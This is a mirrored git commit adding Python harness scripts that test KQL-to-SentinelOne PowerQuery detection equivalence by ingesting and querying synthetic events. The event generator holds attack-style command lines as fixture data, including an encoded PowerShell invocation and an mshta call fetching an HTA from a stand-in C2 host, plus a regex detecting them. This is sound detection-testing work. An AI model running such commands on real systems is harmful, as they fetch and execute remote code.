mirror of
https://github.com/marcredhat/kql
synced 2026-06-13 07:11:17 +00:00
Initial commit: KQL ↔ SDL PowerQuery proof of equivalence
This commit is contained in:
@@ -0,0 +1,34 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Count duplicate timestamps within the generated JSONL.
|
||||
|
||||
SDL appears to dedupe addEvents by (session, ts) - events sharing a ts
|
||||
within the same session are silently dropped. If our generator emits many
|
||||
events at colliding ts_epoch_ms values, only one of each cluster survives.
|
||||
"""
|
||||
import json
|
||||
from collections import Counter, defaultdict
|
||||
from pathlib import Path
|
||||
|
||||
JSONL = Path(__file__).resolve().parents[1] / "sample_data" / "events.jsonl"
|
||||
|
||||
per_type_total = Counter()
|
||||
per_type_unique = defaultdict(set)
|
||||
per_type_max_collision = defaultdict(int)
|
||||
with JSONL.open() as f:
|
||||
for line in f:
|
||||
r = json.loads(line)
|
||||
et = r["event_type"]
|
||||
ts = r["ts_epoch_ms"]
|
||||
per_type_total[et] += 1
|
||||
per_type_unique[et].add(ts)
|
||||
|
||||
print(f"{'event_type':30s} {'events':>8} {'uniq_ts':>8} {'collision_loss%':>16}")
|
||||
print("-" * 70)
|
||||
for et in sorted(per_type_total):
|
||||
n = per_type_total[et]
|
||||
u = len(per_type_unique[et])
|
||||
loss = 100 * (n - u) / n if n else 0
|
||||
print(f"{et:30s} {n:>8} {u:>8} {loss:>15.1f}%")
|
||||
print("-" * 70)
|
||||
print(f"{'TOTAL':30s} {sum(per_type_total.values()):>8} "
|
||||
f"{sum(len(s) for s in per_type_unique.values()):>8}")
|
||||
@@ -0,0 +1,101 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Diagnose why most of our 445 generated events are not queryable in SDL.
|
||||
|
||||
Strategy:
|
||||
1. Take 5 CommonSecurityLog events straight from the generated JSONL,
|
||||
decorate them with a unique probe marker, and ingest as a single batch.
|
||||
2. Wait 10 s for indexing.
|
||||
3. Query for the marker to confirm they are queryable.
|
||||
4. Then bulk-ingest the entire JSONL and report per-event-type counts in SDL
|
||||
vs counts in the local file - to expose where the loss happens.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from collections import Counter
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import add_events, power_query, ingest_jsonl, _clean_attrs # noqa: E402
|
||||
|
||||
JSONL = ROOT / "sample_data" / "events.jsonl"
|
||||
MARKER = f"loss-probe-{int(time.time())}"
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 1: per-type counts in the local file
|
||||
# ---------------------------------------------------------------------------
|
||||
local_counts = Counter()
|
||||
with JSONL.open() as f:
|
||||
for line in f:
|
||||
rec = json.loads(line)
|
||||
local_counts[rec["event_type"]] += 1
|
||||
|
||||
print("=" * 80)
|
||||
print("Local JSONL event_type counts")
|
||||
print("=" * 80)
|
||||
for k, v in sorted(local_counts.items()):
|
||||
print(f" {k:30s} {v}")
|
||||
print(f" {'TOTAL':30s} {sum(local_counts.values())}")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 2: pick 5 CSL events from disk, mark them, ingest, query
|
||||
# ---------------------------------------------------------------------------
|
||||
csl_events = []
|
||||
with JSONL.open() as f:
|
||||
for line in f:
|
||||
rec = json.loads(line)
|
||||
if rec["event_type"] == "CommonSecurityLog":
|
||||
rec["loss_marker"] = MARKER
|
||||
ts_ms = int(rec["ts_epoch_ms"])
|
||||
cleaned = _clean_attrs(rec)
|
||||
csl_events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
|
||||
"thread": "T1", "attrs": cleaned})
|
||||
if len(csl_events) >= 5:
|
||||
break
|
||||
|
||||
print()
|
||||
print("=" * 80)
|
||||
print(f"Step 2: ingesting 5 marker-tagged CSL events ({MARKER})")
|
||||
print("=" * 80)
|
||||
r = add_events(csl_events)
|
||||
print(f"addEvents -> {json.dumps(r)}")
|
||||
print("waiting 10 s for indexing ...")
|
||||
time.sleep(10)
|
||||
|
||||
probe_q = f"loss_marker='{MARKER}' | group n = count() by event_type"
|
||||
r = power_query(probe_q, "1h")
|
||||
print(f"probe query (1h) -> matching={r.get('matchingEvents')}, rows={r.get('values')}")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 3: full bulk ingest of the file via the harness helper
|
||||
# ---------------------------------------------------------------------------
|
||||
print()
|
||||
print("=" * 80)
|
||||
print("Step 3: full bulk ingest of every event in JSONL")
|
||||
print("=" * 80)
|
||||
sent = ingest_jsonl(JSONL)
|
||||
print(f"ingest_jsonl reports {sent} events sent")
|
||||
print("waiting 20 s for indexing ...")
|
||||
time.sleep(20)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 4: per-event-type count in SDL
|
||||
# ---------------------------------------------------------------------------
|
||||
print()
|
||||
print("=" * 80)
|
||||
print("Step 4: SDL counts by event_type")
|
||||
print("=" * 80)
|
||||
print(f"{'event_type':30s} {'local':>8} {'SDL':>8} {'loss%':>8}")
|
||||
print("-" * 60)
|
||||
for et in sorted(local_counts):
|
||||
q = f"event_type='{et}' | group n = count()"
|
||||
r = power_query(q, "1h")
|
||||
sdl_n = 0
|
||||
if r.get("values"):
|
||||
sdl_n = int(r["values"][0][0] or 0)
|
||||
local_n = local_counts[et]
|
||||
loss = 100 * (local_n - sdl_n) / local_n if local_n else 0
|
||||
print(f"{et:30s} {local_n:>8} {sdl_n:>8} {loss:>7.0f}%")
|
||||
@@ -0,0 +1,46 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Probe what data is actually queryable in SDL after ingestion."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
|
||||
from harness.sdl_client import power_query # noqa: E402
|
||||
|
||||
QUERIES = [
|
||||
("any serverHost=kql-proof",
|
||||
"serverHost='kql-proof' | columns event_type, UserPrincipalName, ts_epoch_ms | limit 5"),
|
||||
("count by event_type",
|
||||
"serverHost='kql-proof' | group n=count() by event_type"),
|
||||
("SigninLogs by user",
|
||||
"serverHost='kql-proof' event_type='SigninLogs' | group n=count() by UserPrincipalName"),
|
||||
("SigninLogs min/max ts_epoch_ms",
|
||||
"serverHost='kql-proof' event_type='SigninLogs' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
|
||||
("recent SigninLogs (no time filter)",
|
||||
"serverHost='kql-proof' event_type='SigninLogs' Location='RU' | columns UserPrincipalName, Location | limit 10"),
|
||||
("SecurityEvent EventID column type",
|
||||
"serverHost='kql-proof' event_type='SecurityEvent' | columns EventID, NewProcessName | limit 5"),
|
||||
("Audit OperationName",
|
||||
"serverHost='kql-proof' event_type='AuditLogs' | columns OperationName | limit 10"),
|
||||
]
|
||||
|
||||
for name, q in QUERIES:
|
||||
print("=" * 80)
|
||||
print(f"# {name}")
|
||||
print(f" query: {q}")
|
||||
t = time.time()
|
||||
r = power_query(q, start_time="30d")
|
||||
rows = r.get("values") or []
|
||||
cols = [c.get("name") if isinstance(c, dict) else c
|
||||
for c in (r.get("columns") or [])]
|
||||
print(f" status={r.get('status')} matching={r.get('matchingEvents')} "
|
||||
f"rows={len(rows)} took={time.time()-t:.1f}s")
|
||||
if r.get("status", "").startswith("error/"):
|
||||
print(f" ERROR_BODY: {json.dumps(r, indent=2)[:800]}")
|
||||
if rows:
|
||||
print(f" cols: {cols}")
|
||||
for row in rows[:5]:
|
||||
print(" ", dict(zip(cols, row)))
|
||||
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Wider probe: try a variety of filters and start windows to find our data."""
|
||||
import sys, time, json
|
||||
from pathlib import Path
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
|
||||
from harness.sdl_client import power_query
|
||||
|
||||
QUERIES = [
|
||||
("event_type=SigninLogs 7d (no serverHost)",
|
||||
"event_type='SigninLogs' | columns UserPrincipalName | limit 5", "7d"),
|
||||
("event_type=SigninLogs 1h",
|
||||
"event_type='SigninLogs' | columns UserPrincipalName, ts_epoch_ms | limit 5", "1h"),
|
||||
("UserPrincipalName matching contoso",
|
||||
"UserPrincipalName='alice@contoso.com' | columns event_type, UserPrincipalName | limit 5", "1d"),
|
||||
("anything from xdr tenant 1h",
|
||||
"* | columns event_type, serverHost, logfile | limit 5", "1h"),
|
||||
("logfile contains kql-proof",
|
||||
"logfile contains 'kql-proof' | columns event_type | limit 5", "7d"),
|
||||
("contoso.com in attrs",
|
||||
"Identity contains 'contoso.com' | columns event_type, Identity | limit 5", "1d"),
|
||||
("test: count any events tenant-wide 5m",
|
||||
"* | group n=count()", "5m"),
|
||||
]
|
||||
|
||||
for name, q, window in QUERIES:
|
||||
print("=" * 80)
|
||||
print(f"# {name} (start={window})")
|
||||
print(f" q: {q}")
|
||||
t = time.time()
|
||||
r = power_query(q, start_time=window)
|
||||
rows = r.get("values") or []
|
||||
cols = [c.get("name") if isinstance(c, dict) else c
|
||||
for c in (r.get("columns") or [])]
|
||||
print(f" status={r.get('status')} matching={r.get('matchingEvents')} "
|
||||
f"rows={len(rows)} took={time.time()-t:.1f}s")
|
||||
if r.get("status", "").startswith("error/"):
|
||||
print(f" ERROR: {json.dumps(r)[:500]}")
|
||||
if rows:
|
||||
for row in rows[:5]:
|
||||
print(" ", dict(zip(cols, row)))
|
||||
@@ -0,0 +1,198 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Export each rule's KQL and PowerQuery to disk.
|
||||
|
||||
The exported `.pq` files are:
|
||||
* SELF-CONTAINED and RUNNABLE — every template placeholder
|
||||
(`{RECENT_MS}`) is substituted with a concrete value from the
|
||||
current time anchor, so you can paste straight into SDL.
|
||||
* PRETTY-PRINTED — one pipeline stage per line with continuation
|
||||
indents, matching the style in pmoses-s1/claude-skills.
|
||||
* HEADER-DECORATED — a `//`-comment block names the rule, describes
|
||||
intent, lists field references, and tells the reader what
|
||||
`startTime` to use when running the query.
|
||||
* VALIDATED — after writing, every `.pq` is parsed for known
|
||||
anti-patterns from the SentinelOne PowerQuery skill's pitfalls
|
||||
list (literal `{` braces, deprecated `first()`/`last()`/
|
||||
`percentile()`, leading `*` filter, missing leading pipe before
|
||||
`join`/`union`, etc.). Errors abort the export so the published
|
||||
repo never contains broken queries.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import re
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from rules import RULES, NOW, RECENT_START, BASELINE_START # noqa: E402
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Pretty-printer: turn a single-line PQ string into multi-line idiomatic form.
|
||||
# ---------------------------------------------------------------------------
|
||||
def pretty(pq: str) -> str:
|
||||
"""Break a one-line PQ into idiomatic multi-line form.
|
||||
|
||||
Rule: every `|` that introduces a stage starts a new line; multi-clause
|
||||
`group ... by ...` is split so each agg sits on its own indented line
|
||||
and `by ...` lines up under `group`.
|
||||
"""
|
||||
# Normalise whitespace
|
||||
pq = re.sub(r"\s+", " ", pq).strip()
|
||||
|
||||
# Split on " | " into stages, but keep the leading initial filter
|
||||
parts = pq.split(" | ")
|
||||
head, stages = parts[0].strip(), [s.strip() for s in parts[1:]]
|
||||
|
||||
lines: list[str] = [head] if head else []
|
||||
for s in stages:
|
||||
# Break a long `group a=count(), b=sum(x) by f1, f2` into multi-line.
|
||||
m = re.match(
|
||||
r"^group\s+(.+?)\s+by\s+(.+)$", s, flags=re.IGNORECASE | re.DOTALL)
|
||||
if m:
|
||||
aggs_raw, bys = m.group(1), m.group(2)
|
||||
# Split aggs on commas NOT inside parentheses
|
||||
aggs = _split_top_level_commas(aggs_raw)
|
||||
lines.append("| group " + aggs[0].strip() + ("," if len(aggs) > 1 else ""))
|
||||
for a in aggs[1:-1]:
|
||||
lines.append(" " + a.strip() + ",")
|
||||
if len(aggs) > 1:
|
||||
lines.append(" " + aggs[-1].strip())
|
||||
lines.append(" by " + bys.strip())
|
||||
continue
|
||||
|
||||
# Default: one stage per line
|
||||
lines.append("| " + s)
|
||||
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def _split_top_level_commas(s: str) -> list[str]:
|
||||
out: list[str] = []
|
||||
depth, cur = 0, []
|
||||
for ch in s:
|
||||
if ch == "(":
|
||||
depth += 1; cur.append(ch)
|
||||
elif ch == ")":
|
||||
depth -= 1; cur.append(ch)
|
||||
elif ch == "," and depth == 0:
|
||||
out.append("".join(cur)); cur = []
|
||||
else:
|
||||
cur.append(ch)
|
||||
if cur:
|
||||
out.append("".join(cur))
|
||||
return out
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Anti-pattern scanner — refuses to write a file containing known landmines.
|
||||
# ---------------------------------------------------------------------------
|
||||
PITFALLS: list[tuple[str, str]] = [
|
||||
(r"\{[A-Za-z_]+\}",
|
||||
"Unsubstituted template placeholder (e.g. {RECENT_MS}). "
|
||||
"Substitute before writing."),
|
||||
(r"\bfirst\s*\(",
|
||||
"first(x) is unreliable — use min_by(x, ts_epoch_ms)."),
|
||||
(r"\blast\s*\(",
|
||||
"last(x) is unreliable — use max_by(x, ts_epoch_ms)."),
|
||||
(r"\bpercentile\s*\(",
|
||||
"percentile(x, N) is not a real function — use p50/p95/p99."),
|
||||
(r"\bgroup_unique_values\s*\(",
|
||||
"group_unique_values does not exist — use array_agg_distinct(x, N)."),
|
||||
(r"(?m)^\s*\*\s*(\||$)",
|
||||
"Bare `*` as initial filter returns 500 — use `| limit 5` or "
|
||||
"`field = *`."),
|
||||
(r"(?m)^\s*(join|union)\b",
|
||||
"join/union must start with a leading `|`."),
|
||||
(r"(?m)^\s*#(cmdline|name|hash|ip|storylineid|username|dns)\b",
|
||||
"Shortcut fields (#cmdline, …) are unreliable across tenants — "
|
||||
"use the explicit field name."),
|
||||
]
|
||||
|
||||
|
||||
def scan(text: str) -> list[str]:
|
||||
return [msg for pat, msg in PITFALLS if re.search(pat, text)]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Header builder
|
||||
# ---------------------------------------------------------------------------
|
||||
def header(rule: dict, recent_iso: str, now_iso: str) -> str:
|
||||
field_refs = sorted({f for f in re.findall(
|
||||
r"\b[A-Z][A-Za-z0-9_]+\b", rule["pq"])
|
||||
if f.lower() not in {"and", "or", "not", "true", "false",
|
||||
"filter", "group", "by", "let", "columns",
|
||||
"sort", "limit", "join", "union", "in",
|
||||
"contains", "matches"}})
|
||||
lines = [
|
||||
f"// Rule: {rule['id']}",
|
||||
f"// {rule['description']}",
|
||||
f"//",
|
||||
"// Source KQL: see ../kql/" + rule['id'] + ".kql",
|
||||
"//",
|
||||
"// HOW TO RUN",
|
||||
"// curl POST {sdl}/api/powerQuery with this body, OR paste in",
|
||||
"// the SDL console. Set startTime = '2h' (or wider) so the API",
|
||||
"// scans the freshly-ingested epochs that contain the events.",
|
||||
"//",
|
||||
f"// Time anchor at export: NOW = {now_iso}",
|
||||
f"// Recent-window cutoff: {recent_iso}",
|
||||
"// (`ts_epoch_ms` below is that cutoff expressed in ms.",
|
||||
"// Re-run harness/export_rules.py to refresh after regenerating",
|
||||
"// sample_data/events.jsonl.)",
|
||||
"//",
|
||||
"// Fields referenced: " + ", ".join(field_refs[:10])
|
||||
+ ("…" if len(field_refs) > 10 else ""),
|
||||
"//",
|
||||
"// EDITING NOTE",
|
||||
"// Every line that starts with `|` is a pipeline stage. Each `|`",
|
||||
"// is REQUIRED. If you delete one (e.g. while changing a literal",
|
||||
"// on the same line as a stage), SDL re-parses the keyword that",
|
||||
"// follows as a search term and rejects the query with errors",
|
||||
"// like `'estimate_distinct' is a grouping function`.",
|
||||
]
|
||||
return "\n".join(lines) + "\n"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Main
|
||||
# ---------------------------------------------------------------------------
|
||||
def main() -> None:
|
||||
recent_ms = int(RECENT_START.timestamp() * 1000)
|
||||
recent_iso = RECENT_START.isoformat()
|
||||
now_iso = NOW.isoformat()
|
||||
|
||||
failures: list[tuple[str, list[str]]] = []
|
||||
for r in RULES:
|
||||
# 1. substitute placeholders
|
||||
body = r["pq"].replace("{RECENT_MS}", str(recent_ms))
|
||||
# 2. pretty-print
|
||||
body = pretty(body)
|
||||
# 3. scan
|
||||
bad = scan(body)
|
||||
if bad:
|
||||
failures.append((r["id"], bad))
|
||||
continue
|
||||
# 4. write
|
||||
text = header(r, recent_iso, now_iso) + "\n" + body + "\n"
|
||||
(ROOT / "pq" / f"{r['id']}.pq").write_text(text)
|
||||
|
||||
# Mirror the .kql (verbatim, no substitution)
|
||||
(ROOT / "kql" / f"{r['id']}.kql").write_text(r["kql"].strip() + "\n")
|
||||
|
||||
if failures:
|
||||
print("✗ Export failed — anti-patterns detected:")
|
||||
for rid, msgs in failures:
|
||||
print(f" {rid}")
|
||||
for m in msgs:
|
||||
print(f" - {m}")
|
||||
sys.exit(1)
|
||||
|
||||
print(f"✓ Exported {len(RULES)} rules to kql/ and pq/")
|
||||
print(f" (RECENT_MS = {recent_ms} = {recent_iso})")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,39 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Find SDL's age cutoff for addEvents by sending probe events at increasing
|
||||
ages and seeing which ones become queryable."""
|
||||
import json, sys, time, uuid
|
||||
from pathlib import Path
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import add_events, power_query
|
||||
|
||||
TS_NOW_MS = int(time.time() * 1000)
|
||||
PROBE = uuid.uuid4().hex[:8]
|
||||
|
||||
# 30s, 5min, 30min, 1h, 2h, 4h, 6h, 12h, 24h
|
||||
ages_min = [0.5, 5, 30, 60, 120, 240, 360, 720, 1440]
|
||||
events = []
|
||||
for i, age in enumerate(ages_min):
|
||||
ts_ms = TS_NOW_MS - int(age * 60 * 1000)
|
||||
events.append({
|
||||
"ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
|
||||
"attrs": {"event_type": "CommonSecurityLog",
|
||||
"probe": f"{PROBE}_{i:02d}", "age_min": age},
|
||||
})
|
||||
|
||||
print(f"Sending {len(events)} events at ages {ages_min} min")
|
||||
r = add_events(events)
|
||||
print(f"addEvents -> {json.dumps(r)}")
|
||||
|
||||
print("\nWaiting 12 s ...")
|
||||
time.sleep(12)
|
||||
|
||||
print(f"\nQuerying probe '{PROBE}' over last 48h ...")
|
||||
res = power_query(f"probe contains '{PROBE}' | columns probe, age_min | limit 100", "48h")
|
||||
n = res.get("matchingEvents", 0)
|
||||
vals = res.get("values") or []
|
||||
print(f"matching={n}")
|
||||
got = {row[1] for row in vals}
|
||||
print(f"\n{'age_min':>8} {'sent':>6} {'queryable':>10}")
|
||||
for age in ages_min:
|
||||
landed = "YES" if age in got else "NO"
|
||||
print(f" {age:>6} {'yes':>6} {landed:>10}")
|
||||
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Send one event per batch (separate addEvents call) at different ages,
|
||||
each with a fresh session. This isolates whether SDL is rejecting based on
|
||||
mixed-age batches or just on event age."""
|
||||
import json, sys, time, uuid, importlib
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
|
||||
PROBE = uuid.uuid4().hex[:8]
|
||||
ages_min = [0.5, 5, 30, 60, 120, 240, 480, 720, 1440]
|
||||
|
||||
# Force a fresh session for *every* probe so we eliminate session dedup
|
||||
import harness.sdl_client as sdl
|
||||
|
||||
results = []
|
||||
for i, age in enumerate(ages_min):
|
||||
importlib.reload(sdl) # re-roll the SESSION UUID
|
||||
ts_ms = int(time.time() * 1000) - int(age * 60 * 1000)
|
||||
pv = f"{PROBE}_{i:02d}"
|
||||
ev = {"ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
|
||||
"attrs": {"event_type": "CommonSecurityLog", "probe": pv,
|
||||
"age_min": age}}
|
||||
r = sdl.add_events([ev])
|
||||
print(f"age={age:>6} min session={sdl.SESSION[-12:]} addEvents={r}")
|
||||
results.append((age, pv))
|
||||
|
||||
print("\nWaiting 12 s ...")
|
||||
time.sleep(12)
|
||||
|
||||
q = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
|
||||
res = sdl.power_query(q, "48h")
|
||||
n = res.get("matchingEvents", 0)
|
||||
vals = res.get("values") or []
|
||||
print(f"\nQuery matching={n}")
|
||||
got = {row[1] for row in vals}
|
||||
print(f"\n{'age_min':>8} {'queryable':>10}")
|
||||
for age, _ in results:
|
||||
landed = "YES" if age in got else "NO"
|
||||
print(f" {age:>6} {landed:>10}")
|
||||
@@ -0,0 +1,220 @@
|
||||
"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
|
||||
|
||||
identity sign_in failures x suspicious DNS x suspicious process_start
|
||||
|
||||
Joined on (user_name) and (host). Events are spread across the last 4 hours.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import random
|
||||
import time
|
||||
from pathlib import Path
|
||||
import sys
|
||||
|
||||
ROOT = Path(__file__).resolve().parent
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from sdl_client import add_events, power_query # noqa: E402
|
||||
|
||||
NOW_MS = int(time.time() * 1000)
|
||||
WINDOW_MS = 4 * 60 * 60 * 1000 # 4h
|
||||
|
||||
# --- Personas that will land in ALL 3 streams (these will join) --------------
|
||||
JOIN_TARGETS = [
|
||||
# (user, host)
|
||||
("alice.smith", "wks-alice-01"),
|
||||
("bob.jones", "wks-bob-02"),
|
||||
("carol.nguyen", "wks-carol-03"),
|
||||
]
|
||||
|
||||
# Users that only fail logins (no DNS/proc match) → in failed-only
|
||||
NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]
|
||||
|
||||
# Hosts that have suspicious procs but no DNS hit → noise on proc side
|
||||
NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]
|
||||
|
||||
SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
|
||||
BENIGN_DOMAINS = ["microsoft.com", "google.com", "github.com"]
|
||||
SUSPECT_CMDS = [
|
||||
"powershell.exe -enc SQBFAFgAIA==",
|
||||
"rundll32.exe shell32.dll,Control_RunDLL",
|
||||
"mshta.exe http://c2.example.net/x.hta",
|
||||
]
|
||||
BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
|
||||
|
||||
|
||||
def rand_ts() -> str:
|
||||
"""Random ns-epoch timestamp string within the last 4h."""
|
||||
ms = NOW_MS - random.randint(0, WINDOW_MS - 1)
|
||||
return str(ms * 1_000_000)
|
||||
|
||||
|
||||
def evt(ts_ns: str, attrs: dict) -> dict:
|
||||
return {"ts": ts_ns, "sev": 3, "attrs": attrs, "thread": "T1"}
|
||||
|
||||
|
||||
def gen_failed_signins() -> list[dict]:
|
||||
out = []
|
||||
# Users in JOIN_TARGETS get many failures (so they "stand out")
|
||||
for user, _ in JOIN_TARGETS:
|
||||
for _ in range(random.randint(8, 15)):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "identity",
|
||||
"dataSource.vendor": "azure-ad",
|
||||
"activity_name": "sign_in",
|
||||
"status": "failure",
|
||||
"user.name": user,
|
||||
"src_endpoint.ip": f"203.0.113.{random.randint(2,254)}",
|
||||
}))
|
||||
# Noise: failed-only users
|
||||
for user in NOISE_FAILED_USERS:
|
||||
for _ in range(random.randint(2, 6)):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "identity",
|
||||
"dataSource.vendor": "azure-ad",
|
||||
"activity_name": "sign_in",
|
||||
"status": "failure",
|
||||
"user.name": user,
|
||||
}))
|
||||
# Some successes (should be filtered out by status='failure')
|
||||
for user, _ in JOIN_TARGETS:
|
||||
for _ in range(3):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "identity",
|
||||
"dataSource.vendor": "azure-ad",
|
||||
"activity_name": "sign_in",
|
||||
"status": "success",
|
||||
"user.name": user,
|
||||
}))
|
||||
return out
|
||||
|
||||
|
||||
def gen_dns() -> list[dict]:
|
||||
out = []
|
||||
for user, host in JOIN_TARGETS:
|
||||
# suspicious DNS for these users on their hosts
|
||||
for _ in range(random.randint(3, 6)):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "network",
|
||||
"dataSource.vendor": "zeek",
|
||||
"activity_name": "dns_query",
|
||||
"user.name": user,
|
||||
"device.hostname": host,
|
||||
"dns.question.name": random.choice(SUSPECT_DOMAINS),
|
||||
}))
|
||||
# benign DNS noise from same users
|
||||
for _ in range(5):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "network",
|
||||
"dataSource.vendor": "zeek",
|
||||
"activity_name": "dns_query",
|
||||
"user.name": user,
|
||||
"device.hostname": host,
|
||||
"dns.question.name": random.choice(BENIGN_DOMAINS),
|
||||
}))
|
||||
# Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
|
||||
for user in ["greg.wu", "helen.park"]:
|
||||
for _ in range(3):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "network",
|
||||
"dataSource.vendor": "zeek",
|
||||
"activity_name": "dns_query",
|
||||
"user.name": user,
|
||||
"device.hostname": f"wks-{user.split('.')[0]}-99",
|
||||
"dns.question.name": random.choice(SUSPECT_DOMAINS),
|
||||
}))
|
||||
return out
|
||||
|
||||
|
||||
def gen_process() -> list[dict]:
|
||||
out = []
|
||||
for _, host in JOIN_TARGETS:
|
||||
for _ in range(random.randint(4, 8)):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "process",
|
||||
"dataSource.vendor": "sentinelone",
|
||||
"activity_name": "process_start",
|
||||
"device.hostname": host,
|
||||
"process.cmd_line": random.choice(SUSPECT_CMDS),
|
||||
}))
|
||||
# benign procs on the same hosts
|
||||
for _ in range(5):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "process",
|
||||
"dataSource.vendor": "sentinelone",
|
||||
"activity_name": "process_start",
|
||||
"device.hostname": host,
|
||||
"process.cmd_line": random.choice(BENIGN_CMDS),
|
||||
}))
|
||||
# Noise: suspicious procs on hosts that don't appear in DNS stream
|
||||
for host in NOISE_PROC_HOSTS:
|
||||
for _ in range(3):
|
||||
out.append(evt(rand_ts(), {
|
||||
"dataSource.category": "process",
|
||||
"dataSource.vendor": "sentinelone",
|
||||
"activity_name": "process_start",
|
||||
"device.hostname": host,
|
||||
"process.cmd_line": random.choice(SUSPECT_CMDS),
|
||||
}))
|
||||
return out
|
||||
|
||||
|
||||
def chunked(seq: list, n: int):
|
||||
for i in range(0, len(seq), n):
|
||||
yield seq[i:i + n]
|
||||
|
||||
|
||||
def main() -> None:
|
||||
random.seed(42)
|
||||
events = gen_failed_signins() + gen_dns() + gen_process()
|
||||
random.shuffle(events)
|
||||
print(f"Generated {len(events)} events across the last 4h")
|
||||
|
||||
sent = 0
|
||||
for batch in chunked(events, 200):
|
||||
r = add_events(batch, session_info={
|
||||
"serverHost": "join-demo",
|
||||
"logfile": "join-demo.jsonl",
|
||||
"parser": "json",
|
||||
})
|
||||
if r.get("status") != "success":
|
||||
raise RuntimeError(f"addEvents failed: {r}")
|
||||
sent += len(batch)
|
||||
print(f" ingested {sent}/{len(events)}")
|
||||
time.sleep(0.25)
|
||||
print(f"Done. {sent} events ingested.")
|
||||
|
||||
# Quick verification: run the user's PowerQuery against last 4h
|
||||
pq = r'''| join
|
||||
failed = (
|
||||
dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
|
||||
| columns user_name = user.name
|
||||
| group failed_signins = count() by user_name
|
||||
),
|
||||
dns = (
|
||||
dataSource.category = 'network' AND activity_name = 'dns_query'
|
||||
AND dns.question.name matches "(c2|suspect)\.example\."
|
||||
| columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
|
||||
),
|
||||
proc = (
|
||||
dataSource.category = 'process' AND activity_name = 'process_start'
|
||||
AND process.cmd_line matches "(powershell|rundll32|mshta)"
|
||||
| columns host = device.hostname, cmd_line = process.cmd_line
|
||||
)
|
||||
on failed.user_name = dns.user_name, dns.host = proc.host'''
|
||||
|
||||
print("\nWaiting 20s for SDL indexing, then running the join...")
|
||||
time.sleep(20)
|
||||
res = power_query(pq, start_time="4h")
|
||||
if isinstance(res, dict):
|
||||
matches = res.get("matches") or res.get("data") or res.get("results")
|
||||
print(f"PowerQuery response keys: {list(res.keys())}")
|
||||
if matches is not None:
|
||||
print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
|
||||
else:
|
||||
print(res)
|
||||
else:
|
||||
print(res)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,42 @@
|
||||
#!/usr/bin/env python3
|
||||
"""After bash run_proof.sh, check what's queryable for the latest run."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query
|
||||
|
||||
# Look at the latest proof_run_id from the log
|
||||
log = (ROOT / "reports" / "run.log").read_text()
|
||||
import re
|
||||
m = re.search(r"proof_run_id=([A-Za-z0-9-]+)", log)
|
||||
RUN_ID = m.group(1) if m else None
|
||||
print(f"Latest proof_run_id from log: {RUN_ID}")
|
||||
|
||||
QUERIES = [
|
||||
"any event for this run",
|
